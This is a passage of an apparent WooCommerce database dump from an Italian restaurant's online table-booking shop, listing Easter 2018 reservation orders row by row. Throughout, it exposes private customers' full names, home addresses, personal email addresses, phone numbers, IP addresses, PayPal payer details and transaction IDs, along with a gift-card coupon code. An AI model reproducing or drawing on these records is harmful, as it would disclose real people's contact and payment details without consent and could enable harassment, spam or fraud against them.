Fee','2.39'),(10256,612,'_order_key','wc_order_5a832fc035dbc'),(10257,612,'_customer_user','0'),(10258,612,'_payment_method','paypal'),(10259,612,'_payment_method_title','PayPal'),(10260,612,'_transaction_id',''),(10261,612,'_customer_ip_address','93.40.209.93'),(10262,612,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/58.0.3029.110 safari/537.36 edge/16.16299'),(10263,612,'_created_via','checkout'),(10264,612,'_date_completed',''),(10265,612,'_completed_date',''),(10266,612,'_date_paid',''),(10267,612,'_paid_date',''),(10268,612,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10269,612,'_billing_first_name','Pierpaolo'),(10270,612,'_billing_last_name','Quadrelli'),(10271,612,'_billing_company',''),(10272,612,'_billing_address_1','Via sondrio 2/c'),(10273,612,'_billing_address_2',''),(10274,612,'_billing_city','Riccione'),(10275,612,'_billing_state',''),(10276,612,'_billing_postcode',''),(10277,612,'_billing_country',''),(10278,612,'_billing_email','pier2204@outlook.com'),(10279,612,'_billing_phone','3358110017'),(10280,612,'_shipping_first_name',''),(10281,612,'_shipping_last_name',''),(10282,612,'_shipping_company',''),(10283,612,'_shipping_address_1',''),(10284,612,'_shipping_address_2',''),(10285,612,'_shipping_city',''),(10286,612,'_shipping_state',''),(10287,612,'_shipping_postcode',''),(10288,612,'_shipping_country',''),(10289,612,'_order_currency','EUR'),(10290,612,'_cart_discount','0'),(10291,612,'_cart_discount_tax','0'),(10292,612,'_order_shipping','0.00'),(10293,612,'_order_shipping_tax','0'),(10294,612,'_order_tax','0'),(10295,612,'_order_total','60.00'),(10296,612,'_order_version','3.3.1'),(10297,612,'_prices_include_tax','no'),(10298,612,'_billing_address_index','Pierpaolo Quadrelli  Via sondrio 2/c  Riccione    pier2204@outlook.com 3358110017'),(10299,612,'_shipping_address_index','        '),(10300,612,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10301,612,'Numero bambini fino a 6 anni','0'),(10302,612,'Numero ragazzi fino a 13 anni','0'),(10303,612,'Files attached','[]'),(10304,613,'_order_key','wc_order_5a83302dabbbe'),(10305,613,'_customer_user','0'),(10306,613,'_payment_method','paypal'),(10307,613,'_payment_method_title','PayPal'),(10308,613,'_transaction_id','8KR61335DD083670N'),(10309,613,'_customer_ip_address','178.197.236.134'),(10310,613,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; wow64; trident/7.0; rv:11.0) like gecko'),(10311,613,'_created_via','checkout'),(10312,613,'_date_completed',''),(10313,613,'_completed_date',''),(10314,613,'_date_paid','1518547025'),(10315,613,'_paid_date','2018-02-13 19:37:05'),(10316,613,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10317,613,'_billing_first_name','Pierangelo'),(10318,613,'_billing_last_name','Palladini'),(10319,613,'_billing_company',''),(10320,613,'_billing_address_1','Via Casa Poldo 8'),(10321,613,'_billing_address_2',''),(10322,613,'_billing_city','Carpineti'),(10323,613,'_billing_state',''),(10324,613,'_billing_postcode',''),(10325,613,'_billing_country',''),(10326,613,'_billing_email','bpa@bluewin.ch'),(10327,613,'_billing_phone','0041796706804'),(10328,613,'_shipping_first_name',''),(10329,613,'_shipping_last_name',''),(10330,613,'_shipping_company',''),(10331,613,'_shipping_address_1',''),(10332,613,'_shipping_address_2',''),(10333,613,'_shipping_city',''),(10334,613,'_shipping_state',''),(10335,613,'_shipping_postcode',''),(10336,613,'_shipping_country',''),(10337,613,'_order_currency','EUR'),(10338,613,'_cart_discount','0'),(10339,613,'_cart_discount_tax','0'),(10340,613,'_order_shipping','0.00'),(10341,613,'_order_shipping_tax','0'),(10342,613,'_order_tax','0'),(10343,613,'_order_total','60.00'),(10344,613,'_order_version','3.3.1'),(10345,613,'_prices_include_tax','no'),(10346,613,'_billing_address_index','Pierangelo Palladini  Via Casa Poldo 8  Carpineti    bpa@bluewin.ch 0041796706804'),(10347,613,'_shipping_address_index','        '),(10348,613,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10349,613,'Numero bambini fino a 6 anni','0'),(10350,613,'Numero ragazzi fino a 13 anni','0'),(10351,613,'Files attached','[]'),(10352,613,'Payer PayPal address','bpa@bluewin.ch'),(10353,613,'Payer first name','Pierre-Ange'),(10354,613,'Payer last name','Barman'),(10355,613,'Payment type','instant'),(10356,613,'_paypal_status','completed'),(10357,613,'_download_permissions_granted','yes'),(10358,613,'_recorded_sales','yes'),(10359,613,'_recorded_coupon_usage_counts','yes'),(10360,613,'_order_stock_reduced','yes'),(10361,613,'PayPal Transaction Fee','3.17'),(10362,614,'_order_key','wc_order_5a8438946b837'),(10363,614,'_customer_user','0'),(10364,614,'_payment_method','paypal'),(10365,614,'_payment_method_title','PayPal'),(10366,614,'_transaction_id','9VM301613Y874714H'),(10367,614,'_customer_ip_address','91.252.127.197'),(10368,614,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_1 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c153 safari/604.1'),(10369,614,'_created_via','checkout'),(10370,614,'_date_completed',''),(10371,614,'_completed_date',''),(10372,614,'_date_paid','1518614728'),(10373,614,'_paid_date','2018-02-14 14:25:28'),(10374,614,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10375,614,'_billing_first_name','Mauro'),(10376,614,'_billing_last_name','Alberti'),(10377,614,'_billing_company',''),(10378,614,'_billing_address_1','Via Tagliamento 12'),(10379,614,'_billing_address_2',''),(10380,614,'_billing_city','Ancona'),(10381,614,'_billing_state',''),(10382,614,'_billing_postcode',''),(10383,614,'_billing_country',''),(10384,614,'_billing_email','mauroalberri74@gmail.com'),(10385,614,'_billing_phone','3929289990'),(10386,614,'_shipping_first_name',''),(10387,614,'_shipping_last_name',''),(10388,614,'_shipping_company',''),(10389,614,'_shipping_address_1',''),(10390,614,'_shipping_address_2',''),(10391,614,'_shipping_city',''),(10392,614,'_shipping_state',''),(10393,614,'_shipping_postcode',''),(10394,614,'_shipping_country',''),(10395,614,'_order_currency','EUR'),(10396,614,'_cart_discount','0'),(10397,614,'_cart_discount_tax','0'),(10398,614,'_order_shipping','0.00'),(10399,614,'_order_shipping_tax','0'),(10400,614,'_order_tax','0'),(10401,614,'_order_total','60.00'),(10402,614,'_order_version','3.3.1'),(10403,614,'_prices_include_tax','no'),(10404,614,'_billing_address_index','Mauro Alberti  Via Tagliamento 12  Ancona    mauroalberri74@gmail.com 3929289990'),(10405,614,'_shipping_address_index','        '),(10406,614,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10407,614,'Numero bambini fino a 6 anni','1'),(10408,614,'Numero ragazzi fino a 13 anni','0'),(10409,614,'Files attached','[]'),(10410,614,'Payer PayPal address','mauroalberti74@gmail.com'),(10411,614,'Payer first name','Mauro'),(10412,614,'Payer last name','Alberti'),(10413,614,'Payment type','instant'),(10414,614,'_paypal_status','completed'),(10415,614,'_download_permissions_granted','yes'),(10416,614,'_recorded_sales','yes'),(10417,614,'_recorded_coupon_usage_counts','yes'),(10418,614,'_order_stock_reduced','yes'),(10419,614,'PayPal Transaction Fee','2.39'),(10420,615,'_order_key','wc_order_5a84501840102'),(10421,615,'_customer_user','22'),(10422,615,'_payment_method','paypal'),(10423,615,'_payment_method_title','PayPal'),(10424,615,'_transaction_id','1NP43650EB838804R'),(10425,615,'_customer_ip_address','79.11.190.171'),(10426,615,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.140 safari/537.36'),(10427,615,'_created_via','checkout'),(10428,615,'_date_completed',''),(10429,615,'_completed_date',''),(10430,615,'_date_paid','1518620858'),(10431,615,'_paid_date','2018-02-14 16:07:38'),(10432,615,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10433,615,'_billing_first_name','Piermarini'),(10434,615,'_billing_last_name','Piermarini'),(10435,615,'_billing_company',''),(10436,615,'_billing_address_1','Viale San Martino 90'),(10437,615,'_billing_address_2',''),(10438,615,'_billing_city','Riccione'),(10439,615,'_billing_state',''),(10440,615,'_billing_postcode',''),(10441,615,'_billing_country',''),(10442,615,'_billing_email','l.piermarini@yahoo.com'),(10443,615,'_billing_phone','3402795458'),(10444,615,'_shipping_first_name',''),(10445,615,'_shipping_last_name',''),(10446,615,'_shipping_company',''),(10447,615,'_shipping_address_1',''),(10448,615,'_shipping_address_2',''),(10449,615,'_shipping_city',''),(10450,615,'_shipping_state',''),(10451,615,'_shipping_postcode',''),(10452,615,'_shipping_country',''),(10453,615,'_order_currency','EUR'),(10454,615,'_cart_discount','0'),(10455,615,'_cart_discount_tax','0'),(10456,615,'_order_shipping','0.00'),(10457,615,'_order_shipping_tax','0'),(10458,615,'_order_tax','0'),(10459,615,'_order_total','60.00'),(10460,615,'_order_version','3.3.1'),(10461,615,'_prices_include_tax','no'),(10462,615,'_billing_address_index','Piermarini Piermarini  Viale San Martino 90  Riccione    l.piermarini@yahoo.com 3402795458'),(10463,615,'_shipping_address_index','        '),(10464,615,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10465,615,'Numero bambini fino a 6 anni','0'),(10466,615,'Numero ragazzi fino a 13 anni','0'),(10467,615,'Files attached','[]'),(10468,615,'Payer PayPal address','francescaburbuglini@yahoo.it'),(10469,615,'Payer first name','Francesca'),(10470,615,'Payer last name','Burbuglini'),(10471,615,'Payment type','instant'),(10472,615,'_paypal_status','completed'),(10473,615,'_download_permissions_granted','yes'),(10474,615,'_recorded_sales','yes'),(10475,615,'_recorded_coupon_usage_counts','yes'),(10476,615,'_order_stock_reduced','yes'),(10477,615,'PayPal Transaction Fee','2.39'),(10478,616,'_order_key','wc_order_5a8b35d14bd31'),(10479,616,'_customer_user','0'),(10480,616,'_payment_method','paypal'),(10481,616,'_payment_method_title','PayPal'),(10482,616,'_transaction_id','5BH139600T8941007'),(10483,616,'_customer_ip_address','79.33.23.31'),(10484,616,'_customer_user_agent','mozilla/5.0 (linux; android 6.0.1; sm-g900f build/mmb29m) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.137 mobile safari/537.36'),(10485,616,'_created_via','checkout'),(10486,616,'_date_completed',''),(10487,616,'_completed_date',''),(10488,616,'_date_paid','1519072919'),(10489,616,'_paid_date','2018-02-19 21:41:59'),(10490,616,'_cart_hash','5a9ef1bdbd3b4691455ba910ceb8bfe0'),(10491,616,'_billing_first_name','Elena'),(10492,616,'_billing_last_name','Cocozza'),(10493,616,'_billing_company',''),(10494,616,'_billing_address_1','Via nuova molza 8/b'),(10495,616,'_billing_address_2',''),(10496,616,'_billing_city','Cavezzo'),(10497,616,'_billing_state',''),(10498,616,'_billing_postcode',''),(10499,616,'_billing_country',''),(10500,616,'_billing_email','elena.cocozza@boschrexroth.com'),(10501,616,'_billing_phone','3319915271'),(10502,616,'_shipping_first_name',''),(10503,616,'_shipping_last_name',''),(10504,616,'_shipping_company',''),(10505,616,'_shipping_address_1',''),(10506,616,'_shipping_address_2',''),(10507,616,'_shipping_city',''),(10508,616,'_shipping_state',''),(10509,616,'_shipping_postcode',''),(10510,616,'_shipping_country',''),(10511,616,'_order_currency','EUR'),(10512,616,'_cart_discount','0'),(10513,616,'_cart_discount_tax','0'),(10514,616,'_order_shipping','0'),(10515,616,'_order_shipping_tax','0'),(10516,616,'_order_tax','0'),(10517,616,'_order_total','100.00'),(10518,616,'_order_version','3.3.3'),(10519,616,'_prices_include_tax','no'),(10520,616,'_billing_address_index','Elena Cocozza  Via nuova molza 8/b  Cavezzo    elena.cocozza@boschrexroth.com 3319915271'),(10521,616,'_shipping_address_index','        '),(10522,616,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10523,616,'Numero bambini fino a 6 anni','0'),(10524,616,'Numero ragazzi fino a 13 anni','0'),(10525,616,'Files attached','[]'),(10526,616,'Payer PayPal address','elenakoki614@gmail.com'),(10527,616,'Payer first name','Elena'),(10528,616,'Payer last name','Cocozza'),(10529,616,'Payment type','instant'),(10530,616,'_paypal_status','completed'),(10531,616,'_download_permissions_granted','yes'),(10532,616,'_recorded_sales','yes'),(10533,616,'_recorded_coupon_usage_counts','yes'),(10534,617,'discount_type','fixed_cart'),(10535,617,'coupon_amount','100'),(10536,617,'individual_use','no'),(10537,617,'usage_limit','1'),(10538,617,'expiry_date','2018-08-18'),(10539,617,'apply_before_tax','no'),(10540,617,'free_shipping','no'),(10541,617,'minimum_amount',''),(10542,617,'maximum_amount',''),(10543,617,'exclude_sale_items','no'),(10544,617,'exclude_product_ids',''),(10545,617,'exclude_product_categories',''),(10546,617,'mwb_wgm_giftcard_coupon','616'),(10547,617,'mwb_wgm_giftcard_coupon_unique','online'),(10548,617,'mwb_wgm_giftcard_coupon_product_id','548'),(10549,617,'mwb_wgm_giftcard_coupon_mail_to','Pecchi Maurizio '),(10550,616,'616#178','solymarcouponFY0OW'),(10551,616,'mwb_wgm_order_giftcard','send'),(10552,616,'_order_stock_reduced','yes'),(10553,616,'PayPal Transaction Fee','3.75'),(10555,616,'_edit_lock','1520440868:1'),(10556,616,'_edit_last','1'),(10557,620,'_edit_lock','1554322138:1'),(10558,620,'_edit_last','1'),(10559,620,'_wp_page_template','default'),(10560,620,'_yoast_wpseo_content_score','30'),(10561,620,'_yoast_wpseo_primary_category','1'),(10562,329,'_tax_status','taxable'),(10563,329,'_tax_class',''),(10564,329,'_default_attributes','a:0:{}'),(10565,329,'_download_limit','-1'),(10566,329,'_download_expiry','-1'),(10567,334,'_tax_status','taxable'),(10568,334,'_tax_class',''),(10569,334,'_default_attributes','a:0:{}'),(10570,334,'_download_limit','-1'),(10571,334,'_download_expiry','-1'),(10572,337,'_tax_status','taxable'),(10573,337,'_tax_class',''),(10574,337,'_default_attributes','a:0:{}'),(10575,337,'_download_limit','-1'),(10576,337,'_download_expiry','-1'),(10577,331,'_tax_status','taxable'),(10578,331,'_tax_class',''),(10579,331,'_default_attributes','a:0:{}'),(10580,331,'_download_limit','-1'),(10581,331,'_download_expiry','-1'),(10582,328,'_tax_status','taxable'),(10583,328,'_tax_class',''),(10584,328,'_default_attributes','a:0:{}'),(10585,328,'_download_limit','-1'),(10586,328,'_download_expiry','-1'),(10590,327,'_tax_status','taxable'),(10591,327,'_tax_class',''),(10592,327,'_default_attributes','a:0:{}'),(10593,327,'_download_limit','-1'),(10594,327,'_download_expiry','-1'),(10595,334,'_wp_old_slug','prenotazione-tavolo-per-8-persone-pasqua-2'),(10596,333,'_tax_status','taxable'),(10597,333,'_tax_class',''),(10598,333,'_default_attributes','a:0:{}'),(10599,333,'_download_limit','-1'),(10600,333,'_download_expiry','-1'),(10601,325,'_tax_status','taxable'),(10602,325,'_tax_class',''),(10603,325,'_default_attributes','a:0:{}'),(10604,325,'_download_limit','-1'),(10605,325,'_download_expiry','-1'),(10606,324,'_tax_status','taxable'),(10607,324,'_tax_class',''),(10608,324,'_default_attributes','a:0:{}'),(10609,324,'_download_limit','-1'),(10610,324,'_download_expiry','-1'),(10611,323,'_tax_status','taxable'),(10612,323,'_tax_class',''),(10613,323,'_default_attributes','a:0:{}'),(10614,323,'_download_limit','-1'),(10615,323,'_download_expiry','-1'),(10616,322,'_tax_status','taxable'),(10617,322,'_tax_class',''),(10618,322,'_default_attributes','a:0:{}'),(10619,322,'_download_limit','-1'),(10620,322,'_download_expiry','-1'),(10625,630,'_sku','pasqua-6pax'),(10626,630,'_regular_price','180'),(10627,630,'_sale_price',''),(10628,630,'_sale_price_dates_from',''),(10629,630,'_sale_price_dates_to',''),(10630,630,'total_sales','3'),(10631,630,'_tax_status','taxable'),(10632,630,'_tax_class',''),(10633,630,'_manage_stock','yes'),(10634,630,'_backorders','no'),(10635,630,'_sold_individually','yes'),(10636,630,'_weight',''),(10637,630,'_length',''),(10638,630,'_width',''),(10639,630,'_height',''),(10640,630,'_upsell_ids','a:0:{}'),(10641,630,'_crosssell_ids','a:0:{}'),(10642,630,'_purchase_note',''),(10643,630,'_default_attributes','a:0:{}'),(10644,630,'_virtual','no'),(10645,630,'_downloadable','no'),(10646,630,'_product_image_gallery',''),(10647,630,'_download_limit','-1'),(10648,630,'_download_expiry','-1'),(10649,630,'_thumbnail_id','212'),(10650,630,'_stock','0'),(10651,630,'_stock_status','outofstock'),(10652,630,'_wc_average_rating','0'),(10653,630,'_wc_rating_count','a:0:{}'),(10654,630,'_wc_review_count','0'),(10655,630,'_downloadable_files','a:0:{}'),(10656,630,'_product_attributes','a:0:{}'),(10657,630,'_product_version','3.5.7'),(10658,630,'_price','180'),(10659,630,'slide_template',''),(10660,630,'_yoast_wpseo_primary_product_cat','12'),(10661,630,'_yoast_wpseo_content_score','90'),(10662,630,'_edit_lock','1555696186:2'),(10663,630,'_edit_last','2'),(10664,631,'_sku','pasqua-8pax'),(10665,631,'_regular_price','240'),(10666,631,'_sale_price',''),(10667,631,'_sale_price_dates_from',''),(10668,631,'_sale_price_dates_to',''),(10669,631,'total_sales','1'),(10670,631,'_tax_status','taxable'),(10671,631,'_tax_class',''),(10672,631,'_manage_stock','yes'),(10673,631,'_backorders','no'),(10674,631,'_sold_individually','yes'),(10675,631,'_weight',''),(10676,631,'_length',''),(10677,631,'_width',''),(10678,631,'_height',''),(10679,631,'_upsell_ids','a:0:{}'),(10680,631,'_crosssell_ids','a:0:{}'),(10681,631,'_purchase_note',''),(10682,631,'_default_attributes','a:0:{}'),(10683,631,'_virtual','no'),(10684,631,'_downloadable','no'),(10685,631,'_product_image_gallery',''),(10686,631,'_download_limit','-1'),(10687,631,'_download_expiry','-1'),(10688,631,'_thumbnail_id','212'),(10689,631,'_stock','0'),(10690,631,'_stock_status','outofstock'),(10691,631,'_wc_average_rating','0'),(10692,631,'_wc_rating_count','a:0:{}'),(10693,631,'_wc_review_count','0'),(10694,631,'_downloadable_files','a:0:{}'),(10695,631,'_product_attributes','a:0:{}'),(10696,631,'_product_version','3.5.7'),(10697,631,'_price','240'),(10698,631,'slide_template',''),(10699,631,'_yoast_wpseo_primary_product_cat','12'),(10700,631,'_yoast_wpseo_content_score','90'),(10701,631,'_edit_lock','1554322161:1'),(10702,631,'_edit_last','1'),(10705,633,'_sku','pasquetta-7pax'),(10706,633,'_regular_price','210'),(10707,633,'_sale_price',''),(10708,633,'_sale_price_dates_from',''),(10709,633,'_sale_price_dates_to',''),(10710,633,'total_sales','0'),(10711,633,'_tax_status','taxable'),(10712,633,'_tax_class',''),(10713,633,'_manage_stock','yes'),(10714,633,'_backorders','no'),(10715,633,'_sold_individually','yes'),(10716,633,'_weight',''),(10717,633,'_length',''),(10718,633,'_width',''),(10719,633,'_height',''),(10720,633,'_upsell_ids','a:0:{}'),(10721,633,'_crosssell_ids','a:0:{}'),(10722,633,'_purchase_note',''),(10723,633,'_default_attributes','a:0:{}'),(10724,633,'_virtual','no'),(10725,633,'_downloadable','no'),(10726,633,'_product_image_gallery',''),(10727,633,'_download_limit','-1'),(10728,633,'_download_expiry','-1'),(10729,633,'_thumbnail_id','212'),(10730,633,'_stock','1'),(10731,633,'_stock_status','instock'),(10732,633,'_wc_average_rating','0'),(10733,633,'_wc_rating_count','a:0:{}'),(10734,633,'_wc_review_count','0'),(10735,633,'_downloadable_files','a:0:{}'),(10736,633,'_product_attributes','a:0:{}'),(10737,633,'_product_version','3.5.7'),(10738,633,'_price','210'),(10739,633,'slide_template',''),(10740,633,'_yoast_wpseo_primary_product_cat',''),(10741,633,'_yoast_wpseo_content_score','90'),(10742,633,'_edit_lock','1554322632:1'),(10745,633,'_edit_last','1'),(10746,633,'_wp_old_slug','prenotazione-tavolo-per-7-persone-pasquetta'),(10747,634,'_order_key','wc_order_5aa3ba38b9160'),(10748,634,'_customer_user','0'),(10749,634,'_payment_method','paypal'),(10750,634,'_payment_method_title','PayPal'),(10751,634,'_transaction_id',''),(10752,634,'_customer_ip_address','93.71.146.42'),(10753,634,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(10754,634,'_created_via','checkout'),(10755,634,'_date_completed',''),(10756,634,'_completed_date',''),(10757,634,'_date_paid',''),(10758,634,'_paid_date',''),(10759,634,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(10760,634,'_billing_first_name','Valentina'),(10761,634,'_billing_last_name','Zanella'),(10762,634,'_billing_company',''),(10763,634,'_billing_address_1',''),(10764,634,'_billing_address_2',''),(10765,634,'_billing_city',''),(10766,634,'_billing_state',''),(10767,634,'_billing_postcode',''),(10768,634,'_billing_country',''),(10769,634,'_billing_email','V.zanella2@gmail.com'),(10770,634,'_billing_phone','3382884115'),(10771,634,'_shipping_first_name',''),(10772,634,'_shipping_last_name',''),(10773,634,'_shipping_company',''),(10774,634,'_shipping_address_1',''),(10775,634,'_shipping_address_2',''),(10776,634,'_shipping_city',''),(10777,634,'_shipping_state',''),(10778,634,'_shipping_postcode',''),(10779,634,'_shipping_country',''),(10780,634,'_order_currency','EUR'),(10781,634,'_cart_discount','0'),(10782,634,'_cart_discount_tax','0'),(10783,634,'_order_shipping','0.00'),(10784,634,'_order_shipping_tax','0'),(10785,634,'_order_tax','0'),(10786,634,'_order_total','100.00'),(10787,634,'_order_version','3.3.3'),(10788,634,'_prices_include_tax','no'),(10789,634,'_billing_address_index','Valentina Zanella        V.zanella2@gmail.com 3382884115'),(10790,634,'_shipping_address_index','        '),(10791,634,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(10792,634,'Numero bambini fino a 6 anni','0'),(10793,634,'Numero ragazzi fino a 13 anni','0'),(10794,634,'Files attached','[]'),(10795,635,'_order_key','wc_order_5aa3c0681be5f'),(10796,635,'_customer_user','0'),(10797,635,'_payment_method','paypal'),(10798,635,'_payment_method_title','PayPal'),(10799,635,'_transaction_id',''),(10800,635,'_customer_ip_address','93.71.146.42'),(10801,635,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(10802,635,'_created_via','checkout'),(10803,635,'_date_completed',''),(10804,635,'_completed_date',''),(10805,635,'_date_paid',''),(10806,635,'_paid_date',''),(10807,635,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(10808,635,'_billing_first_name','Valentina'),(10809,635,'_billing_last_name','Zanella'),(10810,635,'_billing_company',''),(10811,635,'_billing_address_1',''),(10812,635,'_billing_address_2',''),(10813,635,'_billing_city',''),(10814,635,'_billing_state',''),(10815,635,'_billing_postcode',''),(10816,635,'_billing_country',''),(10817,635,'_billing_email','V.zanella2@gmail.com'),(10818,635,'_billing_phone','3382884115'),(10819,635,'_shipping_first_name',''),(10820,635,'_shipping_last_name',''),(10821,635,'_shipping_company',''),(10822,635,'_shipping_address_1',''),(10823,635,'_shipping_address_2',''),(10824,635,'_shipping_city',''),(10825,635,'_shipping_state',''),(10826,635,'_shipping_postcode',''),(10827,635,'_shipping_country',''),(10828,635,'_order_currency','EUR'),(10829,635,'_cart_discount','0'),(10830,635,'_cart_discount_tax','0'),(10831,635,'_order_shipping','0.00'),(10832,635,'_order_shipping_tax','0'),(10833,635,'_order_tax','0'),(10834,635,'_order_total','100.00'),(10835,635,'_order_version','3.3.3'),(10836,635,'_prices_include_tax','no'),(10837,635,'_billing_address_index','Valentina Zanella        V.zanella2@gmail.com 3382884115'),(10838,635,'_shipping_address_index','        '),(10839,635,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(10840,635,'Numero bambini fino a 6 anni','0'),(10841,635,'Numero ragazzi fino a 13 anni','0'),(10842,635,'Files attached','[]'),(10843,636,'_order_key','wc_order_5aa3c1c22fb31'),(10844,636,'_customer_user','0'),(10845,636,'_payment_method','paypal'),(10846,636,'_payment_method_title','PayPal'),(10847,636,'_transaction_id',''),(10848,636,'_customer_ip_address','93.71.146.42'),(10849,636,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(10850,636,'_created_via','checkout'),(10851,636,'_date_completed',''),(10852,636,'_completed_date',''),(10853,636,'_date_paid',''),(10854,636,'_paid_date',''),(10855,636,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(10856,636,'_billing_first_name','Valentina'),(10857,636,'_billing_last_name','Zanella'),(10858,636,'_billing_company',''),(10859,636,'_billing_address_1',''),(10860,636,'_billing_address_2',''),(10861,636,'_billing_city',''),(10862,636,'_billing_state',''),(10863,636,'_billing_postcode',''),(10864,636,'_billing_country',''),(10865,636,'_billing_email','valentina@kplusfilm.com'),(10866,636,'_billing_phone','3382884115'),(10867,636,'_shipping_first_name',''),(10868,636,'_shipping_last_name',''),(10869,636,'_shipping_company',''),(10870,636,'_shipping_address_1',''),(10871,636,'_shipping_address_2',''),(10872,636,'_shipping_city',''),(10873,636,'_shipping_state',''),(10874,636,'_shipping_postcode',''),(10875,636,'_shipping_country',''),(10876,636,'_order_currency','EUR'),(10877,636,'_cart_discount','0'),(10878,636,'_cart_discount_tax','0'),(10879,636,'_order_shipping','0.00'),(10880,636,'_order_shipping_tax','0'),(10881,636,'_order_tax','0'),(10882,636,'_order_total','100.00'),(10883,636,'_order_version','3.3.3'),(10884,636,'_prices_include_tax','no'),(10885,636,'_billing_address_index','Valentina Zanella        valentina@kplusfilm.com 3382884115'),(10886,636,'_shipping_address_index','        '),(10887,636,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(10888,636,'Numero bambini fino a 6 anni','0'),(10889,636,'Numero ragazzi fino a 13 anni','0'),(10890,636,'Files attached','[]'),(10891,637,'_order_key','wc_order_5aa3c2f6a31d0'),(10892,637,'_customer_user','0'),(10893,637,'_payment_method','paypal'),(10894,637,'_payment_method_title','PayPal'),(10895,637,'_transaction_id',''),(10896,637,'_customer_ip_address','93.71.146.42'),(10897,637,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_13_3) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.186 safari/537.36'),(10898,637,'_created_via','checkout'),(10899,637,'_date_completed',''),(10900,637,'_completed_date',''),(10901,637,'_date_paid',''),(10902,637,'_paid_date',''),(10903,637,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(10904,637,'_billing_first_name','Nicola'),(10905,637,'_billing_last_name','Fedrigoni'),(10906,637,'_billing_company',''),(10907,637,'_billing_address_1','Lungadige Matteotti 13'),(10908,637,'_billing_address_2',''),(10909,637,'_billing_city','Verona'),(10910,637,'_billing_state',''),(10911,637,'_billing_postcode',''),(10912,637,'_billing_country',''),(10913,637,'_billing_email','nicola@kplusfilm.com'),(10914,637,'_billing_phone','3483558400'),(10915,637,'_shipping_first_name',''),(10916,637,'_shipping_last_name',''),(10917,637,'_shipping_company',''),(10918,637,'_shipping_address_1',''),(10919,637,'_shipping_address_2',''),(10920,637,'_shipping_city',''),(10921,637,'_shipping_state',''),(10922,637,'_shipping_postcode',''),(10923,637,'_shipping_country',''),(10924,637,'_order_currency','EUR'),(10925,637,'_cart_discount','0'),(10926,637,'_cart_discount_tax','0'),(10927,637,'_order_shipping','0.00'),(10928,637,'_order_shipping_tax','0'),(10929,637,'_order_tax','0'),(10930,637,'_order_total','100.00'),(10931,637,'_order_version','3.3.3'),(10932,637,'_prices_include_tax','no'),(10933,637,'_billing_address_index','Nicola Fedrigoni  Lungadige Matteotti 13  Verona    nicola@kplusfilm.com 3483558400'),(10934,637,'_shipping_address_index','        '),(10935,637,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(10936,637,'Numero bambini fino a 6 anni','0'),(10937,637,'Numero ragazzi fino a 13 anni','0'),(10938,637,'Files attached','[]'),(10939,638,'_order_key','wc_order_5aa3c3e507984'),(10940,638,'_customer_user','0'),(10941,638,'_payment_method','paypal'),(10942,638,'_payment_method_title','PayPal'),(10943,638,'_transaction_id','5WH8137003532220F'),(10944,638,'_customer_ip_address','93.71.146.42'),(10945,638,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_13_3) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.186 safari/537.36'),(10946,638,'_created_via','checkout'),(10947,638,'_date_completed',''),(10948,638,'_completed_date',''),(10949,638,'_date_paid','1520682014'),(10950,638,'_paid_date','2018-03-10 12:40:14'),(10951,638,'_cart_hash','c920beb8fe60910c8213e58e0c0a018b'),(10952,638,'_billing_first_name','Nicola'),(10953,638,'_billing_last_name','Fedrigoni'),(10954,638,'_billing_company',''),(10955,638,'_billing_address_1','Lungadige Matteotti 13'),(10956,638,'_billing_address_2',''),(10957,638,'_billing_city','Verona'),(10958,638,'_billing_state',''),(10959,638,'_billing_postcode',''),(10960,638,'_billing_country',''),(10961,638,'_billing_email','nicola@kplusfilm.com'),(10962,638,'_billing_phone','3483558400'),(10963,638,'_shipping_first_name',''),(10964,638,'_shipping_last_name',''),(10965,638,'_shipping_company',''),(10966,638,'_shipping_address_1',''),(10967,638,'_shipping_address_2',''),(10968,638,'_shipping_city',''),(10969,638,'_shipping_state',''),(10970,638,'_shipping_postcode',''),(10971,638,'_shipping_country',''),(10972,638,'_order_currency','EUR'),(10973,638,'_cart_discount','0'),(10974,638,'_cart_discount_tax','0'),(10975,638,'_order_shipping','0.00'),(10976,638,'_order_shipping_tax','0'),(10977,638,'_order_tax','0'),(10978,638,'_order_total','200.00'),(10979,638,'_order_version','3.3.3'),(10980,638,'_prices_include_tax','no'),(10981,638,'_billing_address_index','Nicola Fedrigoni  Lungadige Matteotti 13  Verona    nicola@kplusfilm.com 3483558400'),(10982,638,'_shipping_address_index','        '),(10983,638,'Indicare in caso di 